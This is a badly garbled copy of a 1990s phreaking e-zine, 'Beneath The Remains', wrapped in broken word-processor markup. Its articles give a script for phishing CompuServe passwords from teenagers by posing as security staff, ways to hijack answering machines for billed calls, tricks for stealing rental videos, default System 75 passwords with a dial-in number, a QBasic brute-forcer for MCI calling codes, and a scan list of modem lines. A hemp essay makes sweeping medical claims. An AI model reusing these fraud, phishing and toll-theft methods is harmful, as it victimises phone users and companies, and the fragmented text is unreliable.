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  �   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ڿ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">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����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ô   ���Ĵ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 ���Ŀ ����Ŀ ���Ŀ     ��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 o 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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>I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1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tin Luther King, J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There Be Another Big Bell Crash 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lum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-0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     - Head Honcho -=- Master Programmer -=- substance@global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k Kill (RK) - Founder &amp;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        - The Demon Knight -=- Head Of Format -=- treason@global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VMBs : (These will be updated as they go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- [800] 775-0728 No Extension, Direct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on   - [800] 775-0712 Extension :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 Box   - [800] 775-0712 Extension : xxx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Kill - None That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BTR, it's Editors and writers take no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learn from this mag. So blame it o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in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 HQ Sites : WHQ - Another Way of Life [AWoL] 518-383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Q  - PsychoTron BBS Systems [PBS] 919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- ftp.winternet.com  [/users/craigb/b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: Need A VMB? Well we here at BTR would be more than happy to set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anyone a 800 VMB free of charge. Although we woo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r somethings in return. Not calling cards b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boards, PBXs, internet account, you know small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 don't guarantee your VMB will last that long. We have gi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lasten 12 months, some 1 week. It's like New York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y, You never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: � Substance � Treason � Road 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omp Box � Spoonman  � Pliny The Elder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Ghostrider� Anarchist � Lizard Rock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pheus  � Phive     � Twisted Im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botomy  � Firebug   � Vi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er       � Ice-9     � Malvolent Tricks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Rem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 1 of 14 [*]  The All New BTR Magazine, Editors Note -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2 of 14 [*]  Hacking Compu$erve                     - Roa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3 of 14 [*]  Why The Hell Should Hemp Be Legalized? - Pliny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4 of 14 [*]  Hacking Various Answering Machines     -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5 of 14 [*]  Prepaid Calling Cards                  -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6 of 14 [*]  Renting Movies &amp; Video Games For Free  -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7 of 14 [*]  An Introduction To Delrina Fax Mail    -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8 of 14 [*]  The Guide To The IVX500 VMB System     -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9 of 14 [*]  My Allnet Discovery                    -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 of 14 [*]  System 75 Defaults                     -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 of 14 [*]  A Simple MCi Code Hacker In Qbasic4.5  -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2 of 14 [*]  Some 518-489 Scans                     -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3 of 14 [*]  BTR Shorts                             -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4 of 14 [*]  BTR News &amp; Shit Like That              - Crew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.ARTiCLE.1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e All New Beneath The Remains Magazine / Editors No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Crew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fucking new year. And welcome to the new and improved issue of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s online zine. BTR, a local 518 magazine, which is always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readers with illicit info, ranging from Pyroteknix, Phone Phr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cking to Frauds and ways to get cool stuff for free. We the edit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 are here to help you do cool stuff, and it is hard to kee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keep the articles flowing.  So please send in ANY articles to A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8-383-1369] pretty much anything you send in will be printed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to how to get laid on the first date. Hope you enjoy the mag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distribute this mag and add your bbs file or group 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t like that don't make it too big and if theres that shi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sue of BTR please feel free to delete it. We don't want this ma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dload so don't add to much. Here are some perks if you wan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r: Access to special writers-only teleconferences,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AWoL BBS, you get to see your name in this magazin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f you want to become a executive writer you get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r own personal VMB. To become an exec writer you have to wr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t and help out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.ARTiCLE.2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Hacking CompuSer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d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ats all the other pussy texts on hacking compusrv..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soo lame, with like 50 extra bbs ad's, to make it about 1 me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only about 10k... Well fuck that, do this, I can garu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some GREA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stretch out your Social Engeneering Capabilitie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lamers into their passwords)  1st get a fake trial account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ake a form out of a new modem box and get the free compuserv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eal, form.... Oh yea, to use those you'll need weird shi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#, transit #, check #, bank name/#..... Also the other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&gt; Real f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gt; Real fak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gt; Real fake city/st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&gt; Real fake phone #/dat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compusrv and once your all logged on type 'go cb' when you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B simul8r.  When your on the CB goto the general band, then I b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nel 17 (Teen Dorks).  On there, when it asks for your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say a handle then [HELPER].  Use MIRROREYES, some dork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med about 1 million accounts with.  (yeah he is a real guy). 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RROREYES[HELPER] all in caps like so.  Once on the teen channe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they are always saying shit like 16/f and 10/m... We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llable 14/f or 10/m and (lets say there channel is #10)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:  Hello, this is Joe Crawford, from Compuserve Security Department,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, we are sorry to inform you, but there are security brea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: Oh really?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:  Well have you been using your account extensively for many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, for the last 3 wee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: No... Ive bee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: Ok, well, we can set you up with a new ID and Password, but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verify some informatio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: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: Name, Address, City, State, Phone, ID (even tho its in front of you),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: Felix Johnson, xxx, xxx, xxx- 75053,1122 - PW: cleanse*but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: Ok, thank you Felix, that information has been verifi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orm in the mail, within the next 4-6 weeks confirming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 Until then, you have a security block on your accou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call except from your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k : Great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*O*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at account for about 2 - 3 months before they catch on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much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.ARTiCLE.3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hy The Hell Should Hemp Be Legalize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Pliny The Eld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marijuana should be legalized. I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uses, and has proven to be the "safest" mi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you can put in your body. Marijuana ha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medical, and individu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juana is an Indian hemp plant which can grow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d has been found growing in Arctic regions,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, and even in city dumps. It's scientific name is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va which comes from the Latin word for hemp and sativ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lanted or sown (Leiberman 32). Marijuana was illeg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37, for mostly political reasons (The Benefits of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p is a renewable natural resource that yield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essential for more of our necessities and con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crop. Hemp grown on land in the United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forested or used for agriculture can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il and gas fuel needs. Twelve to thirty-eight million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mp would provide enough fuel for all of ou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would mean $0.60 to $1 per gallon fuel cos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One ton of American grown hemp can be convert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barrels of methanol. It is estimated that marijuan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en to thirty tons per acre. Using hemp to gene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advantages over current fuels. Hemp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, is grown as a crop, so it's a renewable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el products produce carbon dioxide when burned. Some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bon dioxide is contributing to the "greenhouse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radually warming the planet. Marijuana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rop which effectively converts carbon dioxi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(America's Family Farms). Charcoal, pyrolitic oil, g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can be produced from cannabis hemp. Burning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cid rain (Pulp &amp; Paper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juana is one of the best cash-crops that a far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 It is a rugged plant which has strong roots tha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soil to prevent erosion. Is requires less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 and pesticides than do other food and cash cro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, cotton, and tobacco. Hemp leaves drop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eason, helping to add to the fertile topsoil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l retain it's moisture. Depending on how close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are sown, hemp can help protect seedlings,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to eliminate weeds. Hemp is also a good crop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rops, since it helps fertilize the soil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chemicals which poison the earth (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Fa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abis hemp is the longest, most durable, and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natural fiber known to exist on the Earth. Ninety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hip sails were made from hemp fibers since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until the 1930's. Virtually all canvas pain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n cannabis hemp linen canvas. Ninety percent of all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ne was mode from cannabis hemp until 1937 (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 1). Seventy-five to ninety percent of the world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before 1883 was mode from hemp fib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drafts of the Declaration of Independence. In 191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epartment of Agriculture predicted a paper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or portions of the hemp stalk. They stated "Hemp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cts similarly to soda-poplar stock, but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sher and stronger sheet and one of higher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." A three page article appeared in the February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Popular Mechanics entitled "The New Billion Dollar C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d a breakthrough in removing the fiber-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x from the rest of the hemp stalk. The article stated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ions can be drawn to protect the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legitimate culture of hemp, this new cr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 to American agriculture and industry." He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ur times the amount of paper per acre than 20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will grow anywhere in the 48 contiguous states (Pu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3,500 years marijuana has been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drugs in oriental medicine. From 1842 to the 188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was one of the most often used drug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treat the illnesses of adults and children.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1966 through 1976) reconfirms marijuana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of choice for glaucoma, epilepsy, muscular sp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umors, control of nausea in cancer chemo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ysema, migraine, depression, and anorexia nervosa.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glaucoma victims can benefi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Marijuana is two to three times as effectiv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egal medicines for reducing ocular pressu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ide effects associated with legal glaucoma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lso one of the best dilator of the bron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oiles, opening them up to allow more oxygen into the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search indicates that light marijuana smok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apy of choice for mild emphysema to allow mor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bronchi to open up for more oxygen transf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o the oxygen transfer effects caused by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chest pains, shallowness of breath, head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ich are symptomatic of heavy smog exposu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d by light smoking of marijuana through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the best natural expectorant to empty the lu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. It's estimated that marijuana would replace more than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Valium, Librium, and Stellazine. Mariju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est way known to dry one's mouth for denti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legal would replace the highly toxic Probant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lso the best relaxant and back spasm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ort of morphine (The Benefits of Cannabis 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beneficial effects of marijuana ar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, the question of legalization is still an easy on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federal, state, or local has any right to t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at he can or can not do to his body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has a responsibility to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that might be harmful to them. It migh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e that governments have a right to protec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at they can not perceive, such as dang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. Instead of letting the populace decide fo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government is deciding for them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ying that they don't trust John Q. Public to make up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that they must remain every vigilant ove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him from every possible harm in the world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 apparently doesn't want a free think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ople can make up their own minds. Aspirin cause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s a year. During the entire record of human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ngle death has been caused by cannabis (Youn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legalization of cannabis sativa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. There has not been a single death related to he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recorded history. What possible reason can anyone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e citizens of the United State's right to use God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to the fullest? Sure, the chronic smoker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ride, but they know that and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Hemp must be legalized for commercial and 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he purposes of the individual. Who will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ace the great benefits that can come from this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annabis. Peacenet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berman, John S. Plants that grow Wild. New York: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n way to Save America's Family Farms.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lliance for Commerce in Hemp,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Francis L. Cannabis/Marijuana's Accepted Safe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dical Supervision. New York: N.p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Jim. "It's time to reconsider hemp." Pulp &amp; Paper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.ARTiCLE.4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acking Various Answering Mach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nderful world of answering machine hacking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  first  tell you a bit about what the hell the purpose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achines is.  Here is some purpo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Free Calls (3rd par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Chicks Dig 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You can use it as a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nswering machine, you need the IQ of a dog (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, dont bother).  Once you find it, and start hea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*, if that works and it brings you straight to the BEEP, then krad,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.  If not, dont bother hacking it, it wont even let you access it remo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nswering machine to hack is (518)383-1111 Jesus, i must hav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ys code 400 times, everytime he'd change it, id get it :&gt;  N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s are only 2 digit passwords, some 3, and a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(which really isnt needed for an answering machine)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 digits...  Once you hear the beep to start recording, start with 00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yeah, a big button phone for blind people is suggested for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haking ans. mach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1 02 03 04 05 06 07 08 0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2 13 14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23 24 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listening closly to the earpeice while you dial these.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ep, then the messages that were previously recored play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x, if you hit a good one, it will have a audiomated voice, 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g out options. Like * for help, 1 to hear messages, 2 to dele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Change outgoing announcment, 4 to logout (Alltho not in those exact we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where the making free calls comes in... Hit the number that you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tgoing announcment, when you hear another BEEEPPP then s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Operator I except all 3rd party and Collect Calls  ........ Hi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at &lt;the # of the hacked house&gt; please leave a message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ave (usually, unless told otherwise, Earlier)... The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shit is, that if you call the operator and say 'I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rd party call to (npa)xxx-yyyy, my name is Rick'  They wil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The party verified, thank you for abusing AT&amp;T &lt;click&gt; '  Whala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4 free..  Even tho there bill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rd party bill from (yer)num-ber to (cal)led-party'  You CANNOT and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introuble, say you didnt do it, AND even if they prove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what the fuck can they do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s a code line, if its 8oo, which are kinda hard to com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f with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.ARTiCLE.5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n Overview Of Prepaid Calling Ca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 xml:space="preserve">First Releas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ĳ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�����reason� {5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ĳ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ly in the past few months or so I have noticed a rathe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unt of Prepaid Calling Cards being distributed. A Prepaid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lling Card that all you do is pay for it and it has a special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lotted. I thought this would be a particularly useful topi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nce it can aid all phreaks and hackers. Lets say I went to Jo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ve them $15. In return I would most likely recieve a 10 or 15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ard. In this article I am going to focus on mainly a few that I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some about. I have only seen PCCs in intervuls of 7, 10, 25, 3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minute cards. And all of these cards have 1 thing in common. A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ll bitchy voice comes on when theres one minutes left on your PC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. That fucks up any modem connection if any. Plus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re open 24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 a new company called Talk 'N Toss. They are offering 3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0 minute call cards to resalers. So if you wish to place a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m at your business dial their customer service toll-phree ho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631-8895. Plus i'm sure you can SE the lady into getting fre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once so it can be done. This call doesn't appear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. They say it saves 38% from a normal AT&amp;T Call Ca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seen these selling only two places. The first is a gro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n Colorado called Albertsons. I don't know if this grocery st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Colorado, but thats just where I have happen to run across it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Revco drugstore formerly Brooks. They have 10 minute card for $3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20 minute card for $9.99(?) and a 30 minute call card goes for $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a 90 minute phone card goes for a whopping $24.99. Deal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uck with 'em call (800) 213-0304, in the form XXX-XXX-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stomer service # at (800) 354-27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el Comics and Kay-Bee toys have put together a deal to se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X-Men calling cards. They have 4 so called limited edition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ussy's fighting on the front. On the back there is a card and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rea to see the card number. To further expirement call (800) 616-88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9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s Sporting Goods Store has a new deal where if you purch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 worth of shit you get a free 7 minute call card. 7 minute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worth shit. But for some things it is. The number is (800) 437-6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ave 9 digits in the form : XXX-XXX-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ly inserted into Classic 4-Sport, sports cards are S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Prepaid FoNCARDS. Now what the fuck would some baseball card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aid FoNCARD? I still haven't figured it out. But Sprint has som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ic Games Inc. The odds of finding a Sprint FoNCARD is 1:72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how many minutes they are for or how many digits they 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anything I'll keep you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Classic is trying to offer something to the collector aga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t's about real money. Not opening a $1.50 pack of cards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fering 1, 5, 10, 20 and 1000 dollar cards to dealers. These are such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 that the prices double every quarter! So I asked some rip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what the deal was on getting it he said for a $1000 card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750 downpayment with a max order of 1. But the rest you have to ord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he rest to order them wholesale. That's 108 cards a case.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find them singular. Try looking in your local sport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for Sportscard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sports fans once again. GTE is offering 25 minute c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actual calling cards. But these cards you can ord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sional football team helmet logo on the front of it. They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L Collectibles". But the minimum order is 2 cards. Plus then the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minute bonus card that features helmets from all 30 NFL teams.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s only $14.75 but you have to get 2. Call 1-800-GTE-380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And outside the US call (303) 743-4138, extension 712. Or jus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-727-4994. You must order these with a credit card. I saw this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mark is also working with Sprint to rip you off for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They have 10 minute call cards which are poly-wrapped insid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Now for the Christmas season they have tighter wrapped Christm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se sell for $5.95 at you local Hallmark store. But I happen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the best since they're easier to ripoff. Go ahead hack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504-1115, or for the same plus a Happy Holidays greet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03-1225. Either way it works. They are 10 digits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-XXX-XXXX. Their customer service/questions toll-phree hot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16-2121. You can only call US plus US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psi Cola company is the stupidest asses for printing the phon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calling card system on the back of any 12 pack box. Pepsi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tiest cards but spent the most on advertising. They have a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randomly inserted into Pepsi Holiday 12 packs. So just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(800) 929-COLA or (800) 929-3652 (same) and it says "Enter Your 1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". It's just asking to be ripped off. But if you think a Hallmark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ard isn't worth it then fuck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1 the slurpee guys are now working with AT&amp;T to bring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1 Phone Cards. It's supposed to save 50% or more. Now I know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 of shit. On the brochure it shows a data table comparing a 3 minu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 to NY. It says a 7-11 Phone Card is $1.00, Collect Call is $3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 is $2.70, and a Call Card is $1.70. I know when I call LD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5 or close to the cents a minute, not this ripoff.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, 30 or 60 minute cards. I found a nice sales pitch on the broch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After your time is used up, the card becomes inactive and you ju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rd!", yeah right. With this card unlike the Hallmarks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But this call must originate from within the US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ates vary a 15 minute card could only be 5 minute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ive you that ammount of time. It depends where you call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 you have a certain ammount of money credit and once that's used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minutes are left your time is up. Remember when you want a 7-11 c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st to ask for Hab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ose #'s and how many digits your suppo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n Toss Customer Service (800) 631-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n Toss/Revco Cards      (800) 213-0304 -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n Toss/Revco/CS         (800) 354-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en/Kay Bee Toys           (800) 616-8883 - 9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 Sporting Goods        (800) 437-6404 -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i                        (800) 929-CoLA - 1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/Sprint              (800) 504-1115 -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/Sprint/Holidays     (800) 203-1225 -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GTE Football Cards  (800) GTE-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GTE In 303 NPA      (303) 743-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GTE In 303 NPA Fax  (303) 727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.ARTiCLE.6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nting Movies &amp; Video Games For F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ĳ�������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reason� {518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son@global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e able to go to just about anyvideo store or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 free movies and video games that are NEVER due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Yeah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pull this one off. At places where you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1.&gt; Return Videos To Count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2.&gt; Return Videos Through Drop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3.&gt; Stand Outside While Pretending To Wor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1.&gt; Return Videos To Counter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a place where you can rent movies or games. Video sto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easiest targets. Grocery stores are up there to.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store where when after a person rents a movie they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untertop and a person who works there will pick it up and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/she has time. Most people who work at video stores are either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 or overwelmed with work. You don't want to be in a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s watching Benji Comes Home 24/7. You want a nice quick busy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Now the goo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finished their movie/game and set it on the count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o to the area to put it back. But it theres people trying to tak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at the same time they do it once the active customer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re you come in. Hang around a video store for a while so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atmosphere in a way. Find a good area to pretend to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vies but where you can see the cashier and renter. Pick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PM to closing is usually one of the best. Once you have atleast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line and a pile of videos starting to build that's where you mo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. You don't have to be stealth just act like your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recently dropped in. If anything looks semi-interesting jus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ands with the video in them down to under the coun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e behind it can't see the flick you have in your hands. Now you w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turn around and walk to some other section of the store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f viewing anywhere in your clothing you want to. Then jus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work mostly. The key thing is all in the right tim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goods you can watch them, sell them or bu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2.&gt; Return Videos Through A Drops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method is still easy but it takes a little more brains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dropslots. The first is a downward slot through somewh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r table where the stuff drops into a box or something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little door you open then drop the videos in, plus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the pile of videos o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ropslot situation you can find something like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or metal you can slip in to stop videos from going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Then once they have put their shit on in you can just reach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'em. Another idea is take a hanger and unfold it so it's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e side so it sort of locks around one edge and wedge it d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top the flow of videos, then hook the other side to the oth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ill catch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agram demostrating how you can fit something in to stop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s. The rectangle in the middle is the dropslot, and the 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hangar. I have it at a slant to you can better pict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��������������������������������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�    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�    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�    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��Ŀ                                            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�  �                                         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�  �                                         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�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   �                                                �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/    �                                                �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/     �                                                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/      �                                               /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/       �                                              /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/        �                                             /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         ��������������������������������������������-/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                                                      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                                                  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                                               /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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>/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3.&gt; Stand Outside While Pretending To Wor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fairly large cardboard box and write video drop on it in mark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 your going to victimize has nametags, then make one with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for you, or steal one. This betterly works at videostores,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I don't recomend trying this in cold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and as customers walk to the door tell them that you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service and collecting videos outside so they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. If they say they're going inside anyways it's best to sh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because you don't want people complaining about a fake employe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llect as much as you want until you hear si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.ARTiCLE.7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n Introduction To Delrina Fax Ma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ĳ��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�����reason� {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BEGIN�ADD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Fax MailBox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ere you are, where your're headed, or what time it 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certain you'll get every fax people send you �- even if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re to find you. With new Delrina Fax MailBox service, it's eas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we're so sure you'll agree, we're going to give you on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10 fax pages free. Now, confidential and reliable fax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easy se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ne: Someone needs to send you a fax, so they dial your toll-free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we give you) and it goes. Then Fax MailBox recevi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electronically until your read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wo: You use your PC or laptop with a fax modem and Delrina WinFax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oftware, and retrieve your fax with a simple click of the mouse.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machine, enter your password, and print it on the spot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of Fax MailBox as voice mail, but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 and sign up for Delrina Fax MailBox and you'll start g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es ��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FaxMailbox 1-800-23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END�ADD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what this system is a VMB but for faxes. So it's a F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do with this is have someone send your FMB a fax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nter you password and retrieve it. It can be good for hacker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back and forth exchange of el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hat number for the a month free. If you regis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and tell them not to call you or give them a number that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Remember this your service is only cut off when you cancel it.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n keep on going and going and going with bills being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 ran across a Delrina Fax MailBox number by accident,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1-800-368-9414 and then the next few numbers are assigned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ack the password. (That whole 1-800-369-94xx is loaded with th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gets their own 800 number an operator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basically know a little but this is good enough for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.ARTiCLE.8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AirFo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.ARTiCLE.8.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/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\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VX500  Voice Mail Users Gu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\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/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reason� [5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son@global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VX500 Voice Mail Users Guide. I know someone tha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is system for his office and I got a handy manual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over and decided certain things just needed to be known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told most people that I was typing this up they though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to a 6,000 page document, like a Meridian Mail. Bu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efficent and you will find all of the comm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1.&gt; Introduction To IVX5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2.&gt; Entering And Initialinzing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3.&gt; Listening To And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4.&gt; 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5.&gt; Remote Messaging And U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6.&gt; Where Can I Find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1.&gt; Introduction To IVX5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X500 System has a Voice Mail feature that allows callers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recorded messages from any station or touchtone telephone. (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-pulse phones can be routed to the operator for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users and outside callers reach Voice Mail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ialing the telephone number or extension number assigned to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being transferred to Voice Mail by the automated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y being forwarded (using manual or system forward) to Voice Mail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ta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y responding to message waiting indications left by Voice Mail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 (Not available with some telephone systems and station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Voice Mail, you wil hear recorded instructions that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next. Simply listen to the prompts and press the keypad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esired choice. If you do not respond immediately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ompt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interruptible, and you can press the desired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mpt. The prompt will then stop and the system will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Mail user can be assigned a unique Voice Mailbox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mailboxes: Standard, Receive-Only, and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ndard mailbox features include: listening to new messages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, forwarding messages, deleting messages, saving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personal options, and if authorized through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remot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ceive-Only mamilbox user can only listen to new messages, sa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program pers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tem Administrator has all of the Standard mailbox option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record and send broadcast messages, provide mailbox an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aintenance, and record and select custom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telephone systems, your station is signaled when your mailbo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If you have a keyset the MSG key lights and the display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 been received. If you have a single-line set, the MSG ke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ear message waiting signals(ie 6 tones) when the handset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ssage waiting indications (lights, displays and signal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ertain telephone systems and st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tion has more than one associated mailbox, the message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until all messages from all associated mailbox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However, the display does not show which mailbox has recieved th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ing can be enabled or your mailbox through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through your mailbox. It allows you to enter the prima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your mailbox. It allows you to enter the primary and/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or extension number that the system will call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cieved by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2.&gt; Entering And Initializing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r mailbox, the system mayi play one of the follow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ILBOX ALMOST FULL OR FULL: If your mailbox is full, no new mess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ieved unitl you delete waiting or sa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SSAGE COUNT: The system tells you how many messages are wai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, if any and how many are prior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MESSAGING: The system will indicate whether primary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essaging is selected when remote messaging is enabl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you if a programming error has been detected and/or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busy sytem resources when attempting to place a remot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AILBOX B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Dial the Voice Mail access number. (You hear the Main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ring or after the greeting, press * to identify yourself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mailbox number and yoru personal password (if programmed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SG KEY IS LIT AND YOU HAVE A MESSAGE FROM VOI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f required, enter your mail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 personal password and pres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your mailbox, you must initialize it (set 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 will instruct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the default password number to a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a name to identify yourself in the comp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sten to the Voice Mail application introduction. (You can't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If you exti without listening to it, the intro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gain the next time you enter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YOU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al the Voice Mail access number. (You hear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e * to identify yourself as a subscriber or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 mailbox number and default password. (Your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F YOU WANT A PASSWORD, enter a new password using digits 0-9, up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though. Then press #. Voice Mail plays back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a password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# to accept the entry. (Or press 3 if you wish to reenter the p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prompts you to record your directory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 the tone, record your first and last name. When finished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# again to accept the name. (Or bang 1 to replay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without saving, or 2 to add to your name, or press 3 to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he sytem then plays a prompt that introduces you to basic Voic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(You can't skip this tutorial. If you exit without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 introduction will play again the next time your enter you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3.&gt; Listening To And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your mailbox, you are told how many new and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 mailbox as described o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ITHER, Press 1 to listen to your new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ress 3 to listen to your sa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he system plays each message in the queue selected.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to a messag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1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2 to pause. (Then press any key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3 to skip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4 to lower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5 to play the message envelo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6 to rai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# to skip to the end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the message has finished playing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1 to replay the messag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2 to rep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ress 3 to forward a copy of the message to another subscriber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troducto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4 to listen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5 to play the introductory message "envelope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6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7 to save the new message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9 to delete the message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 mailbox as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al the desired mailbox number or group li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 hearing the subscriber's name, press #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ear the tone recor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 pause while recording press 2. To continue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erase and re-record your message pre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ITHER, Hang up to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Use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1 to re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2 to ad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3 to erase and re-recor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ITHER, Press # to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Press 1 to use the special delivery options. You can perform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1 to mark the message "private" to prevent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2 to mark the message "certified" if you want to recieve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ess 3 to mark the message "priority" to place your message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iting messages in the recievin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* to cancel delie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# to deliv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 the message has been sent, you may hang up or choo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1 and enter another mailbox number to send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#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4.&gt; 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Options allow you to customize your mailbox. Voice Mail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ers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: Your primary or alternate greeting is played to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ach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Name: Your recorded name is used to identify yo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verify your mailbox number when messages are addres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ubscribers and oth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ssword: Your password is ued to prevent unauthorized acces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Envelope Contents: Each message is preceded by an "envelop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be programmed to include time/date the message was lef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the message, and/or the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Pers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your mailbox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4 to select Personal Options Menu. You may then perfrom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Your Personal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ITHER, Press 1 to record and/or enable your primary g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R, Press 2 to record and/or enable your alternat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R, Press 3 to enable the system default mailbox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f you pressed 1 or 2, the greeti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, Press # to accept the greeint. (Or, press 1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y the greetiing, press 2 to add to the greeting, or press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nd re-record the gree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Press * to exit without changing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Your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2. Your current name is played. Press 1 to replay you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3 to erase and re-recor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en you hear a tone, record your first and last name, then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Press # again to accept your recorded name. (Or, press 1 to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eded name, press 2 to add to your name, or press 3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-record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nter a password using digits 0-9 (up to 1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#. Voice Mail plays back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# to accept the password as entered. Or, press 3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nd re-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Your Message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enable or disable the time/date option,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enable or disable the message source option,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enable or disable the message lenght option,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enable all options,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disable the envelope, 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accept the envelope,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 return to the Persoanl Options menu without changing the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5.&gt; Remote Messageing and U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ESSAG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emote Mess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nter your mailbox as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Press 1 to set up a Primary destination or press 2 to set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destination. You then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Remote Messaging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f Chosen press 1 to enable pager notification or 2 to ena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fication. Then, press 1 to have it notify you for any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2 to have it notify you on priority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Or Change The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ial the telephone number, then pres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Time Of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en prompted, enter the time at which you wish to h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start and stop. Enter the times with two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r and two digits for the minutes. (If you wish to have cont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, enter the same time for the starting and ending. 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ime in the 12-hour format you will be prom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AM or press 2 f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Days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1 for messagin Monday-Friday, press 2 for all days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select individu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f you selected individual days, you will be prompted to pres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7 which correspond to the days Sunday through Saturday. (ie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) Press # to accept th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and extension number directories can be used any tim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enter a mailbox number. You use the keypad keys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. The system then plays the closest match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ial the Voice Mail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ss # for Direct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nter the desired name by pressing a single key on the dial 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tter of the name, then press #. (The letters match thos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ey. for example pressing 2 to enter A, B, or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ear the system play a helpful prompt instructing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, press 0 at any time while spell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he selected name is played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accept the name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hear the previous name in the directory,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o hear additional information for the selected anem (if allow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hear the next name in the directory,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spell a different name, press 4 and spell a new n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switch the first/last name sort order, pres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6.&gt; Where Can I Find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the truth I don't know. There is no way of ident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any other. Except for the fact that you cannot ge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at it is an IVX500. So good luck and happy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.ARTiCLE.9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y Allnet Discove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ĳ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�����rea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ĳ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I was trying to call up Hallmark on their Holida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use their Prepaid Calling-Card service. But I could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 knew it was around (800) 203-12xx. So I tried 35 as the xx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e would work and I hear the sweet sound of the Allnet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voice echoing through my phone "Please Enter Your 4 Digit P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, I thought sounds like a PBX. I didn't know anything about it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entered 9999 as the PiN. When the operator's voice echoes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ight now I'm feeling pretty good I found a PBX and got the c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. Well it wasn't the right code I wanted. It forwared me to Al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ervice Automed System. Once you get to this hit 2 for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rvice. On that you can find out your account bal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net account number which if you can hack can get you free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tender which I will explain later in this article.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ind out dialing sequences for dialing domestic and international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less shit like finding out mailing addresses to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ills. This service can be reached without going through a PBX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36-3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ack to the PBX hacking. After that customer service discove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number. Then I hear enter my 4 digit PiN again. The second try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 and hear "One Moment Please". I thought jackpot. But the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enter a valid Pin for placing your call". Rats foiled again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knew it was a PBX. I was thinking how lucky I was to have found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ss telco so luckily. Little did I know theirs a mill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And some are fucked up so after entering 2 invalid pins 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meones residence! Incase your wondering one of thos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THE-KRAD (843-5723). At the end of this article will be a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ir extender just dial on up (800) 783-1444. Then wit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tone phone dial that numbers. Then at the first single ton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NPA-PRE-SUFF. You can call international. Then at the second doubl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11 digit Allnet account number and your call will be bi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xxx-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03-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THE-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868-1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68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325-407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ARTiCLE.10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ystem 75 Defaul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   custpw      - Highest acct priv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st      rcustpw     - Restricted cust acct (Still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    browsepw    - Pretty Much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looker -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  r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locate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     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s      i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s      ind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s      inad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suppor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m       bci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im      bcii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y    enquir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ini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s       b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s       bcm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     craf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    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blue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a few in 518, but we aint giving them out, cause if we d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ut 500+ wanna be 518 hackers fucking it up for us...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one in 5o3.... here ya go 5o3-223-5340, it still uses cust and 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ualts, so you can check it out..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ARTiCLE.11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mple MCi Code Hacker By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prog out, i wrote this with some spare time,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ct comport for the comport given defaulted.  Exaclty w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, call the 95o-1o22 # (For MCi's PBX) and dial in a random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starting 0's and 1's) Then will dial a # that will never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 obviously (like i think it's compusrv) Then wait a few s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's the word CONNECT it writes the code to file.  All tho this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way of hacking MCi codes, this has about a 10 ou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getting home.. Try it out, if your not completly satisfied, fu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$(3) = "14"  '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$(8) = "40"  ' SECONDS TO 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COM2:2400,N,8,1" FOR RANDOM AS #1: OPEN "CON" FOR OUTPUT AS #2: OPEN "VALIDS.DAT" FOR APPEND AS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1: PRINT " MCi LD K0DE H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1:  PRINT "�"; : COLOR 9: PRINT " iNiTiALiZiNG MoDeM ": PRINT #1, "ATS11=80": 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:   PRINT "�"; : COLOR 9: PRINT " DiALiNG MC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$ = "": Q$ = ""            ' CLEAR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$ = ""                      ' CLEAR RANDOM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4, 1                   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L = 1 TO VAL(HACK$(3))   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INT(RND * 10)         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L = 1 AND X = 0 THEN X = INT(RND * 9 + 1)   ' [ GENERA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STR$(X)                                    ' [ RANDOM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RIGHT$(X$, 1)                              ' [ #'S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S$ = NUMS$ + X$        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L                      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HACKiNG CODE " + NUMS$                      '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 "ATDT9501022,,,,0-8012501600,,," + NUM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CHR$(27) THEN CLOSE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= INT(TIMER - Start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= INPUT$(LOC(1)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$ = TOTAL$ + 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CHR$(27) THEN CLOSE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1, TOTAL$, "NO CA") &gt; 0 THEN PRINT "NO CARRiER":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1, TOTAL$, "CONN") &gt; 0 THEN PRINT #3, "HACKiNG 95o-1o22 C0DE - " + NUMS$: BEEP: LOCATE 15, 1: PRINT "LAST VALiD CODE " + NUMS$: PRINT #1, "ATZH0": CLOSE #1: OPEN "COM2:19200" FOR RANDOM AS #1: NUMS$ = "": SLEEP 2: TIMEE = 0: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1, TOTAL$, "CARR") &gt; 0 THEN PRINT #3, "HACKiNG 95o-1o22 C0DE - " + NUMS$: BEEP: LOCATE 15, 1: PRINT "LAST VALiD CODE " + NUMS$: PRINT #1, "ATZH0": CLOSE #1: OPEN "COM2:19200" FOR RANDOM AS #1: NUMS$ = "": SLEEP 2: TIMEE = 0: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1, TOTAL$, "BUSY") &gt; 0 THEN PRINT "BUSY":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 = CHR$(27) THEN CLOSE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E = VAL(SCAN$(8)) -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E &lt; 0 THEN PRINT #1, "ATZH0": CLOSE #1: OPEN "COM2:19200" FOR RANDOM AS #1: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IMEE; " SECONDS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 = 57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LEASE PRESS ENT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ARTiCLE.12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Substance from 12-24-94 up to 01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022 - Dead                      ��  12-24-1994  21:5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037 - Dead                      ��  12-24-1994  22:05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038 - Dead                      ��  12-24-1994  22:0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166 - ID + PW                   ��  12-24-1994  23:17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193 - SCo UNiX                  ��  12-24-1994  23:29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266 - Dead                      ��  12-25-1994  00:0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270 - TeleSphere BBS            ��  12-25-1994  00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283 - Needs Acct Id  e,7,1      ��  12-25-1994  00:07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294 - Dead                      ��  12-25-1994  00:1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582 - Sco UniX                  ��  12-25-1994  02:2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589 - Sco UniX                  ��  12-25-1994  02:2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602 - Dead                      ��  12-25-1994  02:3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616 - UniX                      ��  12-25-1994  02:3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734 - UniX                      ��  12-25-1994  03:3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740 - Dead                      ��  12-25-1994  03:33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798 - Dead                      ��  12-25-1994  04:0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810 - Dead                      ��  12-25-1994  04:0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811 - Dead                      ��  12-25-1994  04:0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827 - UniX                      ��  12-25-1994  04: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0836 - Password Required         ��  12-25-1994  04:17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016 - Different Terminal Needed ��  12-25-1994  05:3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024 - Enter Password            ��  12-25-1994  05:4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033 - Dead                      ��  12-25-1994  05:4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070 - 12oo,  num                ��  12-25-1994  06:0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092 - Dead                      ��  12-25-1994  06:1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163 - Federal Interstate Bank?  ��  12-25-1994  06:44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164 - Dead                      ��  12-25-1994  06:4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258 - Welcome To Albany, Unix   ��  12-25-1994  07:3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354 - Dead                      ��  12-25-1994  08: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356 - Dead                      ��  12-25-1994  08:15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377 - Dead                      ��  12-25-1994  08:2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508 - Dead                      ��  12-25-1994  